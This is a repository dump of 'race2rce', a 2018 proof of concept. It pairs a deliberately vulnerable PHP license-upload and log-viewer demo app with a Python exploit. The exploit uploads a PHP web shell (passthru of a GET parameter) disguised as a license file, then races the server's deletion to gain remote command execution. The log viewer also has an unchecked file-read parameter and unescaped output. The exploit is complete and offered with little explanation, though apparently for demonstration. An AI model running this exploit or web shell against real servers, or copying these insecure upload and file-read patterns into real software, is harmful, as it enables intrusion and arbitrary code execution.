├── .DS_Store
├── .gitignore
├── LICENSE
├── README.md
├── elv_rce_exploit.py
└── htdocs
    ├── .DS_Store
    └── Global
        ├── admin
            └── index.php
        ├── api
            └── index.php
        ├── config
            └── index.php
        ├── demo.lic
        ├── lic
            ├── LicenseManager.class.php
            └── index.php
        ├── logs
            ├── fakeapp.1.log
            └── fakeapp.2.log
        └── logviewer
            └── index.php


/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fbogner/race2rce/5160625bd8670103f3f98147c3a99489c0334dfa/.DS_Store


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2018, Florian Bogner
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | * Redistributions of source code must retain the above copyright notice, this
10 |   list of conditions and the following disclaimer.
11 | 
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 |   this list of conditions and the following disclaimer in the documentation
14 |   and/or other materials provided with the distribution.
15 | 
16 | * Neither the name of the copyright holder nor the names of its
17 |   contributors may be used to endorse or promote products derived from
18 |   this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # race2rce
2 | A PoC that shows that Web Vulnerabilities can indeed be interesting
3 | 


--------------------------------------------------------------------------------
/elv_rce_exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | from threading import Thread
 4 | from time import sleep
 5 | import requests
 6 | import urllib
 7 | from bs4 import BeautifulSoup
 8 | import sys
 9 | 
10 | result_received=False
11 | 
12 | if len(sys.argv)!=3:
13 | 	print "Usage: "+sys.argv[0]+" <url> <cmd>"
14 | 	print "Example: "+sys.argv[0]+" http://10.1.1.10/tools/lic/ dir"
15 | 	sys.exit(1)
16 | 
17 | target=sys.argv[1]
18 | cmd=sys.argv[2]
19 | 
20 | def writer(): 
21 | 	files = {'licenseFile':('cmd.php',"""fakeapp
22 | <?xml version="1.0" encoding="UTF-8"?>
23 | <license>
24 | 	<registered_for>Name</registered_for>
25 | 	<customer_mail>user@example.com</customer_mail>
26 | 	<serial>123-1234-123</serial>
27 | </license>
28 | <?php
29 | 	$cmd='whoami';
30 | 	if (isset($_GET['cmd'])) {
31 | 		$cmd=urldecode($_GET['cmd']);
32 | 	}
33 | 	echo '<output>';
34 | 	echo passthru($cmd);
35 | 	echo '</output>';
36 | ?>
37 | 	""")}
38 | 
39 | 	tryNr=0
40 | 	
41 | 	sleep(0.5) # Wait for the reader to be started
42 | 	
43 | 	while not result_received:
44 | 		#print "Try # "+str(tryNr)+": Sending payload"
45 | 		sys.stdout.write('.')
46 | 		sys.stdout.flush()
47 | 		r=requests.post(target+'/index.php', data={'submit':'submit'},files=files)
48 | 
49 | 		tryNr=tryNr+1
50 | 		if tryNr>2000:
51 | 			print "It looks like something is not working here... I will stop now"
52 | 			sys.exit(1);
53 | 
54 | if __name__ == "__main__":
55 | 	print "=================================================="
56 | 	print "= Enterprise License Viewer RCE Exploit          ="
57 | 	print "=                       A RACE TO THE TARGET     ="
58 | 	print "=                                                ="
59 | 	print "= Written by Florian Bogner, 03-2018             ="
60 | 	print "=  florian@bogner.sh // https://bogner.sh        ="
61 | 	print "=================================================="
62 | 	print ""
63 | 	
64 | 	print "Starting Writer thread (Sends the command to the server)"
65 | 	writer_thread = Thread(target = writer)
66 | 	writer_thread.start()
67 | 	
68 | 	print "Starting Reader ..."
69 | 	while True:
70 | 		r = requests.get(target+'/cmd.php?cmd='+urllib.quote_plus(cmd))
71 | 	
72 | 		if r.status_code != 404:
73 | 			soup = BeautifulSoup(r.text,"lxml")
74 | 			output = soup.findAll('output')
75 | 			if len(output)==1:
76 | 				result_received=True
77 | 				print ""
78 | 				print ""
79 | 				print "WWWWWIIIIIINNNNN"
80 | 				print ""
81 | 				print "Received output:"
82 | 				print "=================================================="
83 | 				print output[0].text.strip()
84 | 				print ""
85 | 				break;
86 | 


--------------------------------------------------------------------------------
/htdocs/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fbogner/race2rce/5160625bd8670103f3f98147c3a99489c0334dfa/htdocs/.DS_Store


--------------------------------------------------------------------------------
/htdocs/Global/admin/index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fbogner/race2rce/5160625bd8670103f3f98147c3a99489c0334dfa/htdocs/Global/admin/index.php


--------------------------------------------------------------------------------
/htdocs/Global/api/index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fbogner/race2rce/5160625bd8670103f3f98147c3a99489c0334dfa/htdocs/Global/api/index.php


--------------------------------------------------------------------------------
/htdocs/Global/config/index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fbogner/race2rce/5160625bd8670103f3f98147c3a99489c0334dfa/htdocs/Global/config/index.php


--------------------------------------------------------------------------------
/htdocs/Global/demo.lic:
--------------------------------------------------------------------------------
1 | fakeapp
2 | <?xml version="1.0" encoding="UTF-8"?>
3 | <license>
4 | 	<registered_for>Demo</registered_for>
5 | 	<customer_mail>demo@example.com</customer_mail>
6 | 	<serial>123-1234-123</serial>
7 | </license>


--------------------------------------------------------------------------------
/htdocs/Global/lic/LicenseManager.class.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | // A very simple license manager...
 4 | class LicenseManager { 
 5 | 
 6 | 	/* 
 7 | 		If the given file is a valid XML file, the key
 8 | 		serial is checked for a hardcoded value
 9 | 	*/
10 |     function verifyLicenseFile($file) { 
11 |         $xml=simplexml_load_string(file_get_contents($file));
12 |         if ($xml->serial=="123-1234-123") {
13 |         	return true;
14 |         }
15 |         else {
16 |         	return false;
17 |         }
18 | 		
19 |     } 
20 | } 
21 | ?>


--------------------------------------------------------------------------------
/htdocs/Global/lic/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | 	<title>Enterprise License Viewer</title>
 4 | </head>
 5 | <body>
 6 | <h1>Enterprise License Viewer</h1>
 7 | <p>This site allows you to view your FakeApp's license file. Please select your .lic license file and press upload to verify it.</p>
 8 | 
 9 | <form action="" method="post" enctype="multipart/form-data">
10 |     Select image to upload:
11 |     <input type="file" name="licenseFile" id="licenseFile"> <br>
12 |     <input type="submit" value="Upload & Verify" name="submit">
13 | </form>
14 | 
15 | <?php
16 | $color="green";
17 | $message="";
18 | 
19 | if(isset($_POST["submit"])) {
20 | 	
21 | 	// check if file starts with our magic bytes: fakeapp
22 | 	$MAGIC_BYTES="fakeapp";
23 | 	$fp = @fopen($_FILES["licenseFile"]["tmp_name"],'r');
24 | 	$first_bytes = @fread($fp, strlen($MAGIC_BYTES));   // read first 7 bytes
25 | 	
26 | 	/*
27 | 		if the file starts not with our magic bytes,
28 | 		it can't be a FakeApp license
29 | 	*/
30 | 	if ($first_bytes!=$MAGIC_BYTES) { 
31 | 		$color="red";
32 | 		$message="This is not a valid FakeApp license file";
33 | 		
34 | 		@fclose($fp);
35 | 	}
36 | 	else {
37 | 		/* 
38 | 			If it starts with the magic bytes, store everything after them
39 | 			in a new files. This boils down to removing the first 7 bytes.
40 | 		*/
41 | 		$xml_content = fread($fp, filesize($_FILES["licenseFile"]["tmp_name"])-strlen($MAGIC_BYTES));
42 | 		
43 | 		// We store this is the name as given during the upload
44 | 		file_put_contents($_FILES['licenseFile']['name'],trim($xml_content));
45 | 		
46 | 		// Then we use the LicenseManager class to theck the license...
47 | 		require_once("LicenseManager.class.php");
48 | 		$myLicenseManager = new LicenseManager();
49 | 		$result=$myLicenseManager->verifyLicenseFile($_FILES['licenseFile']['name']);
50 | 		
51 | 		// if it's valid -> say so...
52 | 		if ($result!==false) {
53 | 			$message="This license file looks good.";
54 | 		}
55 | 		// ... otherwise report an error
56 | 		else {
57 | 			$color="red";
58 | 			$message="License file is not valid.";
59 | 		}
60 | 		
61 | 		@fclose($fp);
62 | 		
63 | 		// clean up
64 | 		unlink($_FILES['licenseFile']['name']);
65 | 	}
66 | 	
67 | ?>
68 | <table style="border-width:1px; border-color:<?php echo $color ?>;border-style:solid;">
69 | 	<tr>
70 | 		<td><?php echo $message ?></td>
71 | 	</tr>
72 | </table>
73 | <?php
74 | }
75 | ?>
76 | 
77 | </body>
78 | </html>


--------------------------------------------------------------------------------
/htdocs/Global/logs/fakeapp.1.log:
--------------------------------------------------------------------------------
1 | This is just a sample log file...


--------------------------------------------------------------------------------
/htdocs/Global/logs/fakeapp.2.log:
--------------------------------------------------------------------------------
1 | This is just a second sample log file...


--------------------------------------------------------------------------------
/htdocs/Global/logviewer/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | 	<title>Log Viewer</title>
 4 | </head>
 5 | <body>
 6 | <h1>Log Viewer</h1>
 7 | <p>This site allows you to view your FakeApp's log files. Please select a log to view:</p>
 8 | 
 9 | <?php
10 | 	$log_folder="../logs";
11 | 	
12 | 	$files = scandir($log_folder);
13 | 	foreach($files as $file) {
14 | 		$ext = pathinfo($file, PATHINFO_EXTENSION);
15 | 		if ($ext=="log") {
16 | 			echo "<a href='?file=$log_folder/$file'>$file</a><br>";
17 | 		}
18 | 	}
19 | ?>
20 | 
21 | <?php
22 | $color="green";
23 | $message="";
24 | 
25 | if (isset($_GET['file'])) {
26 | 	$full_file=$_GET['file'];
27 | 	
28 | 	if (file_exists($full_file)) {
29 | 		$message=file_get_contents($full_file);
30 | 	}
31 | 	else {
32 | 		$color="red";
33 | 		$message="File $full_file does not exists.";
34 | 	}	
35 | ?>
36 | <br>
37 | <h2>Log content</h2>
38 | <table style="border-width:1px; border-color:<?php echo $color ?>;border-style:solid;">
39 | 	<tr>
40 | 		<td><?php echo $message ?></td>
41 | 	</tr>
42 | </table>
43 | <?php
44 | }
45 | ?>
46 | 
47 | </body>
48 | </html>


--------------------------------------------------------------------------------